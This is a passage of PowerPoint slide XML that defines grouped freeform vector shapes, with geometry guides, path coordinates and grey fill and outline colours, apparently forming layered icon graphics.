                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2634" y="2104"/>
                <a:ext cx="1298" cy="347"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                  <a:gd name="T1" fmla="*/ 343 h 411"/>
                  <a:gd name="T2" fmla="*/ 255 w 1535"/>
                  <a:gd name="T3" fmla="*/ 0 h 411"/>
                  <a:gd name="T4" fmla="*/ 0 w 1535"/>
                  <a:gd name="T5" fmla="*/ 69 h 411"/>
                  <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                  <a:gd name="T7" fmla="*/ 411 h 411"/>
                  <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                  <a:gd name="T9" fmla="*/ 343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35" h="411">
                    <a:moveTo>
                      <a:pt x="1535" y="343"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="255" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1535" y="343"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="303030"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="545554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8" name="Freeform 20"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2634" y="1879"/>
                <a:ext cx="1298" cy="348"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                  <a:gd name="T1" fmla="*/ 340 h 408"/>
                  <a:gd name="T2" fmla="*/ 255 w 1535"/>
                  <a:gd name="T3" fmla="*/ 0 h 408"/>
                  <a:gd name="T4" fmla="*/ 0 w 1535"/>
                  <a:gd name="T5" fmla="*/ 68 h 408"/>
                  <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                  <a:gd name="T7" fmla="*/ 408 h 408"/>
                  <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                  <a:gd name="T9" fmla="*/ 340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35" h="408">
                    <a:moveTo>
                      <a:pt x="1535" y="340"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="255" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1535" y="340"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="303030"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="545554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899" name="Group 21"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2634" y="1741"/>
                <a:ext cx="1082" cy="1190"/>
                <a:chOff x="4616" y="1681"/>
                <a:chExt cx="361" cy="397"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="901" name="Freeform 22"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4616" y="1906"/>
                  <a:ext cx="361" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1280"/>
                    <a:gd name="T1" fmla="*/ 0 h 607"/>
                    <a:gd name="T2" fmla="*/ 0 w 1280"/>
                    <a:gd name="T3" fmla="*/ 264 h 607"/>
                    <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T5" fmla="*/ 607 h 607"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T7" fmla="*/ 342 h 607"/>
                    <a:gd name="T8" fmla="*/ 0 w 1280"/>
                    <a:gd name="T9" fmla="*/ 0 h 607"/>
                    <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T11" fmla="*/ 566 h 607"/>
                    <a:gd name="T12" fmla="*/ 33 w 1280"/>
                    <a:gd name="T13" fmla="*/ 240 h 607"/>
                    <a:gd name="T14" fmla="*/ 33 w 1280"/>
                    <a:gd name="T15" fmla="*/ 42 h 607"/>
                    <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                    <a:gd name="T17" fmla="*/ 368 h 607"/>
                    <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T19" fmla="*/ 368 h 607"/>
                    <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T21" fmla="*/ 566 h 6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80" h="607">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="264"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="607"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1250" y="566"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="240"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1247" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1250" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1250" y="566"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="545554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02" name="Freeform 23"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4616" y="1831"/>
                  <a:ext cx="361" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1280"/>
                    <a:gd name="T1" fmla="*/ 0 h 607"/>
                    <a:gd name="T2" fmla="*/ 0 w 1280"/>
                    <a:gd name="T3" fmla="*/ 265 h 607"/>
                    <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T5" fmla="*/ 607 h 607"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T7" fmla="*/ 343 h 607"/>
                    <a:gd name="T8" fmla="*/ 0 w 1280"/>
                    <a:gd name="T9" fmla="*/ 0 h 607"/>
                    <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T11" fmla="*/ 565 h 607"/>
                    <a:gd name="T12" fmla="*/ 33 w 1280"/>
                    <a:gd name="T13" fmla="*/ 241 h 607"/>
                    <a:gd name="T14" fmla="*/ 33 w 1280"/>
                    <a:gd name="T15" fmla="*/ 43 h 607"/>
                    <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                    <a:gd name="T17" fmla="*/ 366 h 607"/>
                    <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T19" fmla="*/ 366 h 607"/>
                    <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T21" fmla="*/ 565 h 6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80" h="607">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="265"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="607"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1250" y="565"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="43"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1247" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1250" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1250" y="565"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="545554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03" name="Freeform 24"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4616" y="1756"/>
                  <a:ext cx="361" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1280"/>
                    <a:gd name="T1" fmla="*/ 0 h 607"/>
                    <a:gd name="T2" fmla="*/ 0 w 1280"/>
                    <a:gd name="T3" fmla="*/ 265 h 607"/>
                    <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T5" fmla="*/ 607 h 607"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T7" fmla="*/ 343 h 607"/>
                    <a:gd name="T8" fmla="*/ 0 w 1280"/>
                    <a:gd name="T9" fmla="*/ 0 h 607"/>
                    <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T11" fmla="*/ 567 h 607"/>
                    <a:gd name="T12" fmla="*/ 33 w 1280"/>
                    <a:gd name="T13" fmla="*/ 241 h 607"/>
                    <a:gd name="T14" fmla="*/ 33 w 1280"/>
                    <a:gd name="T15" fmla="*/ 43 h 607"/>
                    <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                    <a:gd name="T17" fmla="*/ 366 h 607"/>
                    <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T19" fmla="*/ 366 h 607"/>
                    <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T21" fmla="*/ 567 h 6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80" h="607">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="265"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="607"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1250" y="567"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="43"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1247" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1250" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1250" y="567"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="545554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04" name="Freeform 25"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4616" y="1681"/>
                  <a:ext cx="361" cy="172"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1280"/>
                    <a:gd name="T1" fmla="*/ 0 h 607"/>
                    <a:gd name="T2" fmla="*/ 0 w 1280"/>
                    <a:gd name="T3" fmla="*/ 264 h 607"/>
                    <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T5" fmla="*/ 607 h 607"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T7" fmla="*/ 342 h 607"/>
                    <a:gd name="T8" fmla="*/ 0 w 1280"/>
                    <a:gd name="T9" fmla="*/ 0 h 607"/>
                    <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T11" fmla="*/ 564 h 607"/>
                    <a:gd name="T12" fmla="*/ 33 w 1280"/>
                    <a:gd name="T13" fmla="*/ 241 h 607"/>
                    <a:gd name="T14" fmla="*/ 33 w 1280"/>
                    <a:gd name="T15" fmla="*/ 40 h 607"/>
                    <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                    <a:gd name="T17" fmla="*/ 366 h 607"/>
                    <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T19" fmla="*/ 366 h 607"/>
                    <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                    <a:gd name="T21" fmla="*/ 564 h 6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80" h="607">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="264"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="607"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1250" y="564"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="33" y="40"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1247" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1250" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1250" y="564"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="545554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00" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3716" y="1975"/>
                <a:ext cx="216" cy="956"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 255"/>
                  <a:gd name="T1" fmla="*/ 68 h 1129"/>
                  <a:gd name="T2" fmla="*/ 0 w 255"/>
                  <a:gd name="T3" fmla="*/ 333 h 1129"/>
                  <a:gd name="T4" fmla="*/ 0 w 255"/>
                  <a:gd name="T5" fmla="*/ 373 h 1129"/>
                  <a:gd name="T6" fmla="*/ 0 w 255"/>
                  <a:gd name="T7" fmla="*/ 564 h 1129"/>
                  <a:gd name="T8" fmla="*/ 0 w 255"/>
                  <a:gd name="T9" fmla="*/ 597 h 1129"/>
                  <a:gd name="T10" fmla="*/ 0 w 255"/>
                  <a:gd name="T11" fmla="*/ 864 h 1129"/>
                  <a:gd name="T12" fmla="*/ 0 w 255"/>
                  <a:gd name="T13" fmla="*/ 897 h 1129"/>
                  <a:gd name="T14" fmla="*/ 0 w 255"/>
                  <a:gd name="T15" fmla="*/ 1129 h 1129"/>
                  <a:gd name="T16" fmla="*/ 255 w 255"/>
                  <a:gd name="T17" fmla="*/ 1060 h 1129"/>
                  <a:gd name="T18" fmla="*/ 255 w 255"/>
                  <a:gd name="T19" fmla="*/ 829 h 1129"/>
                  <a:gd name="T20" fmla="*/ 255 w 255"/>
                  <a:gd name="T21" fmla="*/ 796 h 1129"/>
                  <a:gd name="T22" fmla="*/ 255 w 255"/>
                  <a:gd name="T23" fmla="*/ 529 h 1129"/>
                  <a:gd name="T24" fmla="*/ 255 w 255"/>
                  <a:gd name="T25" fmla="*/ 496 h 1129"/>
                  <a:gd name="T26" fmla="*/ 255 w 255"/>
                  <a:gd name="T27" fmla="*/ 304 h 1129"/>
                  <a:gd name="T28" fmla="*/ 255 w 255"/>
                  <a:gd name="T29" fmla="*/ 264 h 1129"/>
                  <a:gd name="T30" fmla="*/ 255 w 255"/>
                  <a:gd name="T31" fmla="*/ 0 h 1129"/>
                  <a:gd name="T32" fmla="*/ 0 w 255"/>
                  <a:gd name="T33" fmla="*/ 68 h 1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5" h="1129">
                    <a:moveTo>
                      <a:pt x="0" y="68"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="597"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="1060"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="796"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="529"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="0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828282"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="545554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905" name="Group 330"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6410449" y="2563836"/>
              <a:ext cx="1016000" cy="971550"/>
              <a:chOff x="80" y="2"/>
              <a:chExt cx="1939" cy="1851"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="906" name="Group 331"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="80" y="2"/>
                <a:ext cx="1939" cy="1851"/>
                <a:chOff x="80" y="2"/>
                <a:chExt cx="1939" cy="1851"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="919" name="Freeform 332"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1247" y="511"/>
                  <a:ext cx="100" cy="1002"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 208"/>
                    <a:gd name="T1" fmla="*/ 0 h 2088"/>
                    <a:gd name="T2" fmla="*/ 0 w 208"/>
                    <a:gd name="T3" fmla="*/ 1698 h 2088"/>
                    <a:gd name="T4" fmla="*/ 208 w 208"/>
                    <a:gd name="T5" fmla="*/ 2088 h 2088"/>
                    <a:gd name="T6" fmla="*/ 208 w 208"/>
                    <a:gd name="T7" fmla="*/ 390 h 2088"/>
                    <a:gd name="T8" fmla="*/ 0 w 208"/>
                    <a:gd name="T9" fmla="*/ 0 h 20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8" h="2088">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1698"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="208" y="2088"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="208" y="39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6B6B6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920" name="Group 333"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="80" y="2"/>
                  <a:ext cx="1939" cy="1851"/>
                  <a:chOff x="80" y="2"/>
                  <a:chExt cx="1939" cy="1851"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="921" name="Freeform 334"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="80" y="2"/>
                    <a:ext cx="1939" cy="1851"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 4042"/>
                      <a:gd name="T1" fmla="*/ 1084 h 3858"/>
                      <a:gd name="T2" fmla="*/ 0 w 4042"/>
                      <a:gd name="T3" fmla="*/ 3858 h 3858"/>
                      <a:gd name="T4" fmla="*/ 1848 w 4042"/>
                      <a:gd name="T5" fmla="*/ 3361 h 3858"/>
                      <a:gd name="T6" fmla="*/ 1848 w 4042"/>
                      <a:gd name="T7" fmla="*/ 1661 h 3858"/>
                      <a:gd name="T8" fmla="*/ 2641 w 4042"/>
                      <a:gd name="T9" fmla="*/ 1448 h 3858"/>
                      <a:gd name="T10" fmla="*/ 2641 w 4042"/>
                      <a:gd name="T11" fmla="*/ 3149 h 3858"/>
                      <a:gd name="T12" fmla="*/ 4042 w 4042"/>
                      <a:gd name="T13" fmla="*/ 2773 h 3858"/>
                      <a:gd name="T14" fmla="*/ 4042 w 4042"/>
                      <a:gd name="T15" fmla="*/ 0 h 3858"/>
                      <a:gd name="T16" fmla="*/ 0 w 4042"/>
                      <a:gd name="T17" fmla="*/ 1084 h 38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4042" h="3858">
                        <a:moveTo>
                          <a:pt x="0" y="1084"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="3858"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1848" y="3361"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1848" y="1661"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="2641" y="1448"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="2641" y="3149"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4042" y="2773"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4042" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1084"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="DDDDDD"/>
                  </a:solidFill>
                  <a:ln w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="969696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922" name="Group 335"/>
                  <p:cNvGrpSpPr>
                    <a:grpSpLocks/>
                  </p:cNvGrpSpPr>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="940" y="661"/>
                    <a:ext cx="434" cy="959"/>
                    <a:chOff x="940" y="661"/>
                    <a:chExt cx="434" cy="959"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="923" name="Freeform 336"/>
                    <p:cNvSpPr>
                      <a:spLocks/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="1264" y="928"/>
                      <a:ext cx="16" cy="43"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 33 w 33"/>
                        <a:gd name="T1" fmla="*/ 61 h 90"/>
                        <a:gd name="T2" fmla="*/ 0 w 33"/>
                        <a:gd name="T3" fmla="*/ 0 h 90"/>
                        <a:gd name="T4" fmla="*/ 0 w 33"/>
                        <a:gd name="T5" fmla="*/ 59 h 90"/>
                        <a:gd name="T6" fmla="*/ 12 w 33"/>
                        <a:gd name="T7" fmla="*/ 85 h 90"/>
                        <a:gd name="T8" fmla="*/ 12 w 33"/>
                        <a:gd name="T9" fmla="*/ 50 h 90"/>
                        <a:gd name="T10" fmla="*/ 33 w 33"/>
                        <a:gd name="T11" fmla="*/ 90 h 90"/>
                        <a:gd name="T12" fmla="*/ 33 w 33"/>
                        <a:gd name="T13" fmla="*/ 61 h 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33" h="90">
                          <a:moveTo>
                            <a:pt x="33" y="61"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12" y="85"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="12" y="50"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="33" y="90"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="33" y="61"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="A0A0A0"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="bg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4" name="Freeform 337"/>
                    <p:cNvSpPr>
                      <a:spLocks/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="940" y="777"/>
                      <a:ext cx="27" cy="843"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 55"/>
                        <a:gd name="T1" fmla="*/ 0 h 1757"/>
                        <a:gd name="T2" fmla="*/ 0 w 55"/>
                        <a:gd name="T3" fmla="*/ 822 h 1757"/>
                        <a:gd name="T4" fmla="*/ 0 w 55"/>
                        <a:gd name="T5" fmla="*/ 822 h 1757"/>
                        <a:gd name="T6" fmla="*/ 0 w 55"/>
                        <a:gd name="T7" fmla="*/ 822 h 1757"/>
                        <a:gd name="T8" fmla="*/ 0 w 55"/>
                        <a:gd name="T9" fmla="*/ 1290 h 1757"/>
                        <a:gd name="T10" fmla="*/ 0 w 55"/>
                        <a:gd name="T11" fmla="*/ 1290 h 1757"/>
                        <a:gd name="T12" fmla="*/ 0 w 55"/>
                        <a:gd name="T13" fmla="*/ 1290 h 1757"/>
                        <a:gd name="T14" fmla="*/ 0 w 55"/>
                        <a:gd name="T15" fmla="*/ 1757 h 1757"/>
                        <a:gd name="T16" fmla="*/ 55 w 55"/>
                        <a:gd name="T17" fmla="*/ 1743 h 1757"/>
                        <a:gd name="T18" fmla="*/ 55 w 55"/>
                        <a:gd name="T19" fmla="*/ 47 h 1757"/>
                        <a:gd name="T20" fmla="*/ 0 w 55"/>
                        <a:gd name="T21" fmla="*/ 0 h 175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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="55" h="1757">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="822"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="822"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="822"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1290"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1757"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="55" y="1743"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="55" y="4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0A0A0"/>
                    </a:solidFill>
                    <a:ln w="6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="bg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5" name="Freeform 338"/>
                    <p:cNvSpPr>
                      <a:spLocks/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="940" y="661"/>
                      <a:ext cx="434" cy="139"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 848 w 905"/>
                        <a:gd name="T1" fmla="*/ 16 h 290"/>
                        <a:gd name="T2" fmla="*/ 0 w 905"/>
                        <a:gd name="T3" fmla="*/ 243 h 290"/>
                        <a:gd name="T4" fmla="*/ 55 w 905"/>
                        <a:gd name="T5" fmla="*/ 290 h 290"/>
                        <a:gd name="T6" fmla="*/ 848 w 905"/>
                        <a:gd name="T7" fmla="*/ 78 h 290"/>
                        <a:gd name="T8" fmla="*/ 905 w 905"/>
                        <a:gd name="T9" fmla="*/ 0 h 290"/>
                        <a:gd name="T10" fmla="*/ 848 w 905"/>
                        <a:gd name="T11" fmla="*/ 16 h 2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905" h="290">
                          <a:moveTo>
                            <a:pt x="848" y="16"/>
                          </a:moveTo>
